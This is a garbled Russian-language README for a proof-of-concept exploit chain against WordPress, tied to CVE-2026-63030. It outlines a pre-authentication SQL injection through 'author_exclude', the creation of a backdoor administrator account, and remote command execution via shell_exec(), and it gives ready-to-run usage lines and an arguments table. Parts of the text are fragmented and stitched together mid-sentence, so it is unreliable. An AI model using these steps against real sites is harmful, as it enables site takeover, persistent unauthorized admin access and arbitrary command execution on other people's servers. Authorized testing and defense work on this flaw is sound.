
PoC-эксплойт для CVE-2026-63030, уязвимости до аутентификации в WordPress (версии с 6.9.0 по 7.0.1).
Эксплойт PoC для CVE-2026-63030 — уязвимости предварительной аутентификации в WordPress (версии 6.9.0–7.0.1). Он объединяет:
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude, используя путаницу маршрутов для выполнения UNION-запроса.shell_exec().Это всего лишь proof-of-concept.
Он предназначен для:
Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Авторы не несут ответственности за неправомерное использование.
wp-config.php, SQL-инъекция может не сработать.DISALLOW_FILE_MODS и DISALLOW_UNFILTERED_HTML в конфигурации цели.| Аргумент | Описание |
|---|
--url | URL корневой директории WordPress (обязательный) |
--username | Имя администратора для создания (автогенерация, если не указано) |
--password | Пароль администратора (автогенерация, если не указано) |
--email | Email администратора (автогенерация, если не указано) |
--command, -c | Команда для выполнения через плагин (по умолчанию: id) |
--post-id | Укажите ID опубликованной записи (автоопределение, если не указано) |
--timeout | Таймаут HTTP в секундах (по умолчанию: 60) |